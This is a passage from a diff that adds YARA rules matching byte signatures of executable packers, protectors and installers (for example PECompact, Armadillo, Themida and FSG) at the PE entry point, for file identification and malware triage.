+		$a0 = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? ?? ?? ?? EB 01 ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv123RC1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PUNiSHERv15DEMOFEUERRADERAHTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 }
+	$a1 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 24 EB 04 64 6B 88 18 89 85 9C C2 41 00 EB 04 64 6B 88 18 58 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 C2 50 00 EB D3 5B F3 68 89 5C 24 48 5C 24 58 FF 8D 5C 24 58 5B 83 C3 4C 75 F4 5A 8D 71 78 75 09 81 F3 EB FF 52 BA 01 00 83 EB FC 4A FF 71 0F 75 19 8B 5C 24 00 00 81 33 50 53 8B 1B 0F FF C6 75 1B 81 F3 EB 87 1C 24 8B 8B 04 24 83 EC FC EB 01 E8 83 EC FC E9 E7 00 00 00 58 EB FF F0 EB FF C0 83 E8 FD EB FF 30 E8 C9 00 00 00 89 E0 EB FF D0 EB FF 71 0F 83 C0 01 EB FF 70 F0 71 EE EB FA EB 83 C0 14 EB FF 70 ED }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PECompactv140b2v140b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 86 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv198
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 56 57 FF 15 2C 81 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CryptoLockv202EngRyanThian
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 }
+	$a1 = { 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
+	$a2 = { 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule vfpexeNcv600WangJianGuo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 63 58 E8 01 00 00 00 7A 58 2D 0D 10 40 00 8D 90 C1 10 40 00 52 50 8D 80 49 10 40 00 5D 50 8D 85 65 10 40 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XPEORv099b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }
+	$a1 = { E8 ?? ?? ?? ?? 5D 8B CD 81 ED 7A 29 40 ?? 89 AD 0F 6D 40 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev100BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeCompact2253276BitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 55 53 51 57 56 52 8D 98 C9 11 00 10 8B 53 18 52 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 5A 8B F8 50 52 8B 33 8B 43 20 03 C2 8B 08 89 4B 20 8B 43 1C 03 C2 8B 08 89 4B 1C 03 F2 8B 4B 0C 03 CA 8D 43 1C 50 57 56 FF }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02CodeLockAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv100Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01BorlandDelphi50KOLMCKAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 FF 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 EB 04 00 00 00 01 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FlyCrypter10ut1lz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 56 57 55 BB 2C ?? ?? 44 BE 00 30 44 44 BF 20 ?? ?? 44 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 44 44 00 74 06 FF 15 58 30 44 44 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 20 30 44 44 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 18 30 44 44 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 2F FA FF FF FF 15 24 30 44 44 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 44 00 74 06 FF 15 10 ?? ?? 44 8B 06 50 E8 51 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 44 44 E8 26 FF FF FF C3 }
+	$a1 = { 55 8B EC 83 C4 F0 53 B8 18 22 44 44 E8 7F F7 FF FF E8 0A F1 FF FF B8 09 00 00 00 E8 5C F1 FF FF 8B D8 85 DB 75 05 E8 85 FD FF FF 83 FB 01 75 05 E8 7B FD FF FF 83 FB 02 75 05 E8 D1 FD FF FF 83 FB 03 75 05 E8 87 FE FF FF 83 FB 04 75 05 E8 5D FD FF FF 83 FB 05 75 05 E8 B3 FD FF FF 83 FB 06 75 05 E8 69 FE FF FF 83 FB 07 75 05 E8 5F FE FF FF 83 FB 08 75 05 E8 95 FD FF FF 83 FB 09 75 05 E8 4B FE FF FF 5B E8 9D F2 FF FF 90 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePECompact14xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 2E A8 00 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule muckisprotectorIImucki
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 00 00 00 31 C0 89 41 14 89 41 18 80 6A 00 E8 85 C0 74 12 64 8B 3D 18 00 00 00 8B 7F 30 0F B6 47 02 85 C0 74 01 C3 C7 04 24 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtector10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20b2v20b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 55 56 57 FF 15 ?? 70 40 00 8B 35 ?? 92 40 00 05 E8 03 00 00 89 44 24 14 B3 20 FF 15 2C 70 40 00 BF 00 04 00 00 68 ?? ?? ?? 00 57 FF 15 ?? ?? 40 00 57 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV10Dvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 CA 31 41 00 68 06 32 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GardianAngel10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 8C C8 8E D8 8E C0 FC BF ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXpressorv12CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RSCsProcessPatcherv14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E1 01 00 00 80 38 22 75 13 80 38 00 74 2E 80 38 20 75 06 80 78 FF 22 74 18 40 EB ED 80 38 00 74 1B EB 19 40 80 78 FF 20 75 F9 80 38 00 74 0D EB 0B 40 80 38 00 74 05 80 38 22 74 00 8B F8 B8 04 60 40 00 68 00 20 40 00 C7 05 A2 20 40 00 44 00 00 00 68 92 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov190b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 04 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 F0 C1 40 00 68 A4 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 08 E2 40 00 68 94 95 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualCASM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstall25xxJtit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+	$a1 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B F1 7C 04 3B F2 7C 02 89 2E 83 C6 04 3B F7 7C E3 58 50 68 00 00 40 00 68 80 5A }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule hmimysPacker10hmimys
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 }
+
+condition:
+		$a0
+}
+	
+	
+rule ACProtectV20risco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV112V114LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 60 }
+
+condition:
+		$a0
+}
+	
+	
+rule JDPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 8B D5 81 ED ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 81 EA 06 ?? ?? ?? 89 95 ?? ?? ?? ?? 83 BD 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv1304Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ScObfuscatorSuperCRacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 33 C9 8B 1D ?? ?? ?? ?? 03 1D ?? ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D ?? ?? ?? ?? 75 E7 A1 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 61 FF 25 ?? ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock098SpecialBuildforgotheXer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 99 D7 FF FF 00 00 00 ?? ?? ?? ?? AA ?? ?? 00 00 00 00 00 00 00 00 00 CA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01DEF10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02REALBasicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov260c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? ?? 68 F4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov260a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 94 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 B4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaWinLicenseV10XV17XDLLOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 ?? 89 48 01 61 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressor12CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NeoLitev10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 44 24 04 8D 54 24 FC 23 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 FF 25 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeBundlev30standardloader
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 60 BE 00 B0 42 00 8D BE 00 60 FD FF C7 87 B0 E4 02 00 31 3C 4B DF 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ProtectionPlusvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 60 29 C0 64 FF 30 E8 ?? ?? ?? ?? 5D 83 ED 3C 89 E8 89 A5 14 ?? ?? ?? 2B 85 1C ?? ?? ?? 89 85 1C ?? ?? ?? 8D 85 27 03 ?? ?? 50 8B ?? 85 C0 0F 85 C0 ?? ?? ?? 8D BD 5B 03 ?? ?? 8D B5 43 03 ?? ?? E8 DD ?? ?? ?? 89 85 1F 03 ?? ?? 6A 40 68 ?? 10 ?? ?? 8B 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorV22Xsoftcompletecom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF E0 E8 04 00 00 00 FF FF FF FF 5E C3 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallVirtualizationSuite30353043ThinstallCompany
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01CrunchPEHeuristicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEPACKv405v406
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 06 ?? ?? 8E C0 8B 0E ?? ?? 8B F9 4F 8B F7 FD F3 A4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeStubOEPv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 33 C9 33 D2 B8 ?? ?? ?? 00 B9 FF }
+	$a1 = { E8 05 00 00 00 33 C0 40 48 C3 E8 05 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule EXEShieldv01bv03bv03SMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor049Hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 52 51 53 55 E8 15 01 00 00 32 ?? ?? 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv14x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PocketPCSHA
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 86 2F 96 2F A6 2F B6 2F 22 4F 43 68 53 6B 63 6A 73 69 F0 7F 0B D0 0B 40 09 00 09 D0 B3 65 A3 66 93 67 0B 40 83 64 03 64 04 D0 0B 40 09 00 10 7F 26 4F F6 6B F6 6A F6 69 0B 00 F6 68 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 22 4F F0 7F 0A D0 06 D4 06 D5 0B 40 09 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorV1451CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? 00 05 00 ?? ?? 00 A3 08 ?? ?? 00 A1 08 ?? ?? 00 B9 81 ?? ?? 00 2B 48 18 89 0D 0C ?? ?? 00 83 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstall25
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A7 1A 00 00 B9 6C 1A 00 00 BA 20 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD EC 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SuckStopv111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? ?? ?? BE ?? ?? B4 30 CD 21 EB ?? 9B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DEFv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 }
+	$a1 = { BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? 10 40 00 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule UnnamedScrambler251Beta2252p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
